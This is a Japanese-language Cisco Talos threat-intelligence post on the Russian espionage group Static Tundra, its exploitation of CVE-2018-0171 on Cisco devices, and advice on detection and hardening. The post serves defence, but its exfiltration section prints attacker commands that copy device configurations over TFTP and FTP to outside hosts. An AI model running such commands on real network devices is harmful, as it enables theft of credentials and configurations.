- Static Tundra はロシア政府が支援するサイバースパイグループです。10 年以上にわたって活動している FSB(ロシア連邦保安庁)第 16 センターと関係のあるグループで、ネットワークデバイスの侵害を専門とし、長期的なインテリジェンス収集を行っています。
- 同グループは、7 年前の脆弱性(CVE-2018-0171)を積極的にエクスプロイトしています。この脆弱性は Cisco IOS ソフトウェアの Smart Install 機能に存在し、公開時点でパッチが提供されていましたが、同グループはサポートが終了したパッチ未適用のネットワークデバイスを狙って、設定データの窃取と持続的なアクセスの確立を試みています。
- 主な標的は通信、高等教育、製造業などの組織で、被害地域は北米、アジア、アフリカ、ヨーロッパに及び、ロシア政府の戦略的利益に基づいて選定されています。
- Static Tundra は高度な永続化手法を採用して、何年もの間アクセスの検出を免れています。以前から確認されている SYNful Knock ファームウェアインプラント(最初の報告は 2015 年)やカスタムの SNMP ツールなどが永続化手法として使用されています。
- この脅威はロシアの活動にとどまらず、国家の支援を受けた他の攻撃グループもネットワークデバイスを侵害するために同様の攻撃を仕掛けている可能性があり、あらゆる組織にとって、包括的なパッチ適用とセキュリティ強化が不可欠です。
- パッチ未適用で Smart Install が有効なデバイスは、今後も悪用され続けることになります。
- お客様には、CVE-2018-0171 のパッチを適用するか、パッチ適用が不可能な場合はアドバイザリの記載に従って Smart Install を無効化することを強くお勧めします。必要な場合は、TAC リクエスト
を送信してカスタマーサポートをご利用ください。
Cisco Talos は 2015 年以降、パッチ未適用でサポートが終了している場合が多いシスコのネットワークデバイスを高度な攻撃者が侵害していることを確認しています。継続的な分析を通じて確認された最近の多くの活動に基づき、Talos はこの脅威クラスターを「Static Tundra」と命名しました。このブログでは、この攻撃グループに関する観測結果を概説し、Static Tundra に関連する活動の検出と防止に関する推奨事項を提示します。
攻撃者とマルウェア攻撃の概要
Static Tundra はロシア政府が支援するサイバースパイグループであり、ネットワークデバイスの侵害を専門とし、ロシア政府にとって戦略的に重要な組織への長期的な侵入活動を支援していると、Talos は高い確信度で評価しています。Static Tundra は、TTP(戦術、手法、手順)および被害状況の共通点から、別のグループ「Energetic Bear」(別名 BERSERK BEAR)のサブクラスターである可能性が高く、この推測は FBI によって裏付けられています。2022 年の米国司法省の起訴状では、Energetic Bear はロシア連邦保安庁(FSB)第 16 センターと関連しているとされています。Talos はまた、「SYNful Knock」の過去の使用が Static Tundra に関連していると中程度の確信度で評価しています。SYNful Knock とは、侵害を受けたシスコデバイスにインストールされていた悪意のあるインプラントです(2015 年に公表)。
Static Tundra は、10 年以上活動し、長期にわたってスパイ活動を続けてきた高度なサイバー犯罪者と評価されています。ネットワークデバイスに関する高度な知識を持ち、カスタムツールを使用していることから、ネットワーク侵入を専門としていることがわかります。カスタムツールの中には、当時は最新鋭だったものの、今では 10 年前のものとなった SYNful Knock ルータインプラントが含まれているとみられます。
Static Tundra は、パッチ未適用でサポートが終了している場合が多いネットワークデバイスを狙い、主要な標的へのアクセスを確立するとともに、同グループが関心を持つ関連する標的に対する二次的な作戦活動をサポートします。ネットワークデバイスへの初期アクセスを確立すると、Static Tundra はそこを足掛かりに標的環境への侵入をさらに進め、他のネットワークデバイスも侵害し、長期的な持続性と情報収集のためのチャネルを確立します。同グループが検出されることなく標的環境へのアクセスを何年も維持していることから、この点は明らかです。
Static Tundra は、Cisco IOS ソフトウェアおよび Cisco IOS XE ソフトウェアの Smart Install 機能に存在していた公開済みの脆弱性(CVE-2018-0171)をエクスプロイトし、パッチ未適用でサポートが終了している場合が多いシスコデバイスを長年にわたり侵害してきました。この攻撃の目的は、デバイスを侵害してその設定情報を大量に抽出し、ロシア政府の現行の戦略目標や利益に基づいてその情報を必要に応じて利用することにあると考えられます。実際に Static Tundraは、ロシアの優先事項の変化に応じて適応の仕方や作戦の焦点を変えています。
Static Tundra は 2015 年に初めて確認されて以来、通信、高等教育、製造業の組織を標的としてきました。被害組織は主にウクライナとその同盟国に拠点を置いていますが、世界各地の組織も攻撃を受けています。Talos は、Static Tundra がロシアにとって戦略的に重要な組織、特に製造業と高等教育機関へのネットワーク侵入攻撃を継続すると予測しており、政治的関心の対象にはウクライナとその同盟国が引き続き含まれるとみています。
このブログでは、Static Tundra によるネットワークデバイスへの継続的な攻撃に焦点を当てていますが、長年にわたり何度も警告してきたように、国家の支援を受けた他の多くの攻撃グループもネットワークデバイスへのアクセスを狙っています。組織は、他の Advanced Persistent Threat(APT)グループも同様の作戦を優先的に実行している可能性があると認識する必要があります。
標的と被害状況
Static Tundra は、主に通信、高等教育、製造業の組織を標的としており、ロシアの戦略的利益の変化に合わせて標的を時系列で変えていることが確認されています。被害組織は判明しているだけでも、北米、アジア、アフリカ、ヨーロッパなど、複数の地域にまたがっています。
Talos が確認した標的のシフトの中でも特に顕著だった例が、ロシア・ウクライナ戦争勃発に伴ってウクライナ国内の組織に対する攻撃が激化し、それ以降も活発に活動が続いていることです。一般的に Static Tundra が関係しているとされてきた侵害はより限定的で選択的なものでしたが、戦争勃発後はウクライナの複数の業種の組織が侵害を受けていることが確認されています。
TTP(戦術、手法、手順)
Static Tundra の主な作戦目的は、1)ネットワークデバイスを侵害し、将来の作戦に役立つ機密性の高いデバイス設定情報を収集すること、2)ロシアの戦略的利益に沿った長期的なスパイ活動を支援するためにネットワーク環境への持続的なアクセスを確立すること、の 2 点であると Talos は評価しています。シスコのネットワークインフラは世界中に広く存在し、アクセスを提供する可能性も高いため、同グループはこれらのデバイスの侵害に重点を置くだけでなく、デバイスとやり取りしてデバイス上に持続的に存在し続けるためのツールの開発も重視しているとみられます。Static Tundra は作戦目的を達成するために、持続性とステルス性を優先したカスタムツールを使用しています。これらのツールと手法が標的にしているのが、パッチ未適用の古いエッジデバイスです。
初期アクセス
遅くとも 2021 年以降、Static Tundra が CVE-2018-0171 を積極的にエクスプロイトしていることが確認されています。この脆弱性は、Cisco IOS ソフトウェアおよび Cisco IOS XE ソフトウェアで確認された既知の脆弱性であり、すでにパッチが提供されていますが、認証を経ていないリモートの攻撃者がこの脆弱性を悪用し、対象デバイスのリロードをトリガーしてサービス妨害(DoS)状態を引き起こしたり、対象デバイスで任意のコードを実行したりする可能性があります。
シスコは 2018 年に CVE-2018-0171 のパッチを公開しました。シスコが以前から推奨しているように、国家の支援を受けている、または国家と連携している Advanced Persistent Threat(APT)グループがこの脆弱性を現在も活発にエクスプロイトしている状況を踏まえ、お客様には直ちにパッチを適用することを強くお勧めします。サポート終了により、パッチを適用できないデバイスについては、2018 年のセキュリティアドバイザリに記載されている追加のセキュリティ対策が必要です。Smart Install が有効になっているパッチ未適用のデバイスは、お客様が対策を講じない限り、上記の攻撃やその他の攻撃に対して脆弱なままとなります。
Static Tundra がカスタムツールを使用して、CVE-2018-0171 のエクスプロイトと、それに続く、標的として事前に定義した IP アドレスの設定情報の漏洩を自動化していると、Talos は中程度の確信を持って評価しています。これらの IP アドレスは、Shodan や Censys などのサービスで公開されているスキャンデータを使用して収集されたと考えられます。このプロセスは、レッドチーム演習のブログや同種の公表文献で報告されているものと類似しています。
Smart Install の脆弱性をエクスプロイトして最初の侵入に成功した後、Static Tundra の CVE-2018-0171 攻撃チェーンは、実行中の設定を変更してローカルの Trivial File Transfer Protocol(TFTP)サーバーを有効にする次のコマンドを実行します。
tftp-server nvram:startup-config
これで、新たに起動した TFTP サーバーとの間で追加の接続を確立し、スタートアップ設定を取得できるようになります。抽出された設定から、ログイン情報や Simple Network Management Protocol(SNMP)のコミュニティストリングが明らかになる可能性があり、これらがシステムへのより直接的なアクセスに悪用されるおそれがあります。
Static Tundra は、過去の攻撃で侵害したコミュニティストリングまたは推測したコミュニティストリングを利用して、SNMP 経由でデバイスへの初期アクセスを行うことも確認されています。中には、読み取り/書き込み権限を持つ「anonymous」や「public」といった安全でないコミュニティストリングを使用していた事例もあります。
実行
Static Tundra は、標的環境への初期アクセスを取得すると、初期アクセスフェーズで侵害したコミュニティストリングを使用して SNMP サービスと通信します。場合によっては、SNMP トラフィックの送信元アドレスをスプーフィングします。この手法により、攻撃者はインフラを難読化し、アクセス制御リスト(ACL)をバイパスできます。これは、SNMP プロトコルがセッション確立を使用しないためです。SNMP は、コマンドを直接実行したり、実行中の設定を変更したり、現在実行中の設定やスタートアップ設定を抽出したりするなど、侵害されたデバイス上でさまざまな実行オプションを提供します。
Static Tundra は SNMP を利用して、リモートサーバーからテキストファイルをダウンロードし、それを実行中の設定に追加するように指示を送信します。これにより、TELNET などのリモートサービスを有効化すると同時に、新たに作成されたローカルユーザーアカウントを介してアクセス手段を増やすことができます。
永続化
ネットワーク環境は比較的静的であるため、一般に Static Tundra は、侵害した SNMP コミュニティストリングとログイン情報を利用して、何年にもわたってシステムへのアクセスを維持します。場合によっては、権限のあるローカルユーザーアカウントや読み取り/書き込み権限を持つ追加の SNMP コミュニティストリングを作成することもあります。
Static Tundra は、SYNful Knock と呼ばれる Cisco IOS ファームウェアインプラントを利用して、侵害したシステムへの持続的なアクセスを確立することが確認されています。SYNful Knock は、攻撃者が Cisco IOS イメージに注入し、侵害したデバイスにロードするモジュール型のインプラントです。これで、デバイスの再起動後も持続するステルス的なアクセス手段が確保されます。以後、細工した TCP SYN パケット(いわゆる「マジックパケット」)を送信すれば、デバイスへのリモートアクセスが可能になります。技術的な内容全般を含む詳細については、Mandiant 社が 2015 年に公開したブログ記事をご覧ください。また、2015 年のシスコのブログ記事にも詳細な情報が掲載されています。さらに、Talos は SYNful Knock インプラントをスキャンして検出するためのスクリプトを公開しています。
防御の回避
Static Tundra は、侵害したデバイスの TACACS+ 設定を変更し、リモートログ機能を妨害することが確認されています。また、アクセス制御リスト(ACL)を変更して、自らの管理下にある特定の IP アドレスまたは IP アドレス範囲からのアクセスを許可します。
検出
Static Tundra は、Shodan や Censys などのサービスで公開されているスキャンデータを使用して、対象のシステムを特定していると考えられます。標的環境に侵入すると、「show cdp neighbors」などのネイティブコマンドを多用して、標的環境内にあるその他の対象システムを明らかにします。こうして、スキャンをアクティブに行うことなく、比較的ステルス性の高い方法でさらなる標的を特定します。
収集
Static Tundra の主な目的の 1 つは、インテリジェンスの観点で価値のあるネットワークトラフィックをキャプチャすることです。そのため、Static Tundra は Generic Routing Encapsulation(GRE)トンネルを確立し、対象トラフィックを自らが管理するインフラにリダイレクトします。これにより、トラフィックをキャプチャしてさらに分析できるようになります。また、侵害したシステムから NetFlow データを収集して漏洩させ、価値がある可能性があるストリームの送信元と宛先の情報を明らかにすることも確認されています。
漏洩
Static Tundra は、さまざまな手段で設定情報を漏洩させます。具体的には、「初期アクセス」で説明した Smart Install のエクスプロイト手順による TFTP 経由のインバウンド接続、侵害したデバイスから自らが管理するインフラへの TFTP または FTP 経由のアウトバウンド接続、設定情報のコピープロセスを利用した SNMP 経由のインバウンド接続などの手段です。
Static Tundra は、CISCO-CONFIG-COPY-MIB によって提供されるカスタムの SNMP ツールと機能を使用して、侵害したデバイスから TFTP または Remote Copy Protocol(RCP)経由で設定を漏洩させます。
Static Tundra は、次のコマンドを使用して TFTP および FTP 経由で設定ファイルを漏洩させることが確認されています。
do show running-config | redirect tftp://:/conf_bckp copy running-config ftp://user:pass@/output.txt
攻撃の検知
今回の攻撃に関連する可能性のある不審なアクティビティを特定するには、以下の手段を推奨します。
- ベストプラクティスに沿った包括的な設定管理(監査を含む)を実施する。
- 包括的な認証、承認、コマンド発行のモニタリングを実施する。
- syslog と AAA ログをモニタリングし、異常なアクティビティがないか(通常よりログが少ない、またはアクティビティログの取得に空白がないかなど)を確認する。
- 動作や設定に異常な変更がないか環境をモニタリングする。
- ネットワークデバイスをプロファイル(NetFlow とポートスキャンを使用してフィンガープリント)して、攻撃対象領域の変化(新しいポートの開閉や、(経由せずに)送受信されるトラフィックなど)を確認する。
- 可能であれば NetFlow の可視性を高め、異常なデータ量の変化を特定する。
- 空ではない、または異常に大きい .bash_history ファイルがないか確認する。
シスコのフォレンジックガイドを使用して、追加の識別と検出を実施することができます。
予防策
あらゆる業界の組織に次の対策を強くお勧めします。
- シスコ固有の対策
- CVE-2018-0171 のパッチを適用する。
- パッチが適用できない場合は、アドバイザリに従って Smart Install を無効にする。
- デバイス設定時には、セキュリティ強化ガイドを活用する。
- Telnet を無効にしてシスコのデバイス上のどの仮想端末(VTY)回線でも利用できないようにするために、すべての VTY スタンザを「transport input ssh」および「transport output none」に設定する。
- CVE 2018-0171 の利用可能なパッチを適用できないデバイスでは、「no vstack」を使用してシスコの Smart Install サービスを無効にする。古すぎてパッチを適用できないテクノロジーについては、サポート終了の管理計画を策定する。
- ローカルアカウントのログイン情報の設定には、タイプ 8 のパスワードを利用する。
- TACACS+ のキーの設定にはタイプ 6 のパスワードを使用する。
- CVE-2018-0171 のパッチを適用する。
- 一般的な対策
- 更新、アクセス制御、ユーザー教育、ネットワーク セグメンテーションなど、セキュリティのベストプラクティスに忠実に従う。
- 米国政府および業界のセキュリティアドバイザリから最新情報を入手し、記載されている問題を軽減するために推奨される設定変更を検討する。
- デバイスの更新は可能な限り積極的に行う。これには、既知の脆弱性に対するパッチを現在使用しているハードウェアとソフトウェアに適用することや、サポート終了となったハードウェアおよびソフトウェアをリプレースすることが含まれる。
- 複雑なパスワードとコミュニティストリングを選択し、デフォルトのログイン情報は使用しない。
- 多要素認証(MFA)を使用する。
- 監視と設定に関わるすべてのトラフィック(例:SNMPv3、HTTPS、SSH、NETCONF、RESTCONF)を暗号化する。
- TACACS+ やジャンプホストといった認証システムをロックダウンし、積極的にモニタリングする。
- AAA を利用して、主要なデバイスの保護(例:ローカルアカウント、TACACS+、RADIUS)の設定変更を禁止する。
- 管理用インターフェイスの外部公開や異常なインターフェイスの使用を防止し、モニタリングする(例:SNMP、SSH、HTTP、HTTPS)。
- 暗号化されていない Web 管理機能をすべて無効にする。
- すべての管理プロトコル(例:SNMP、SSH、Netconf)のアクセス制御リストの存在と正確さを検証する。
- 設定を一元的に保存し、デバイスにプッシュする。デバイスを、そのデバイスの設定に関する信頼できる情報源として扱わない。
侵害の指標(IOC)
| 指標 | タイプ | 既知の活動期間 |
| 185.141.24[.]222 | IP アドレス | 2023/03/23 |
| 185.82.202[.]34 | IP アドレス | 2025/01/15 ~ 2025/02/28 |
| 185.141.24[.]28 | IP アドレス | 2024/10/01 ~ 2025/07/03 |
| 185.82.200[.]181 | IP アドレス | 2024/10/01 ~ 2024/11/15 |
本稿は 2025 年 8 月 20 日にTalos Group
Authors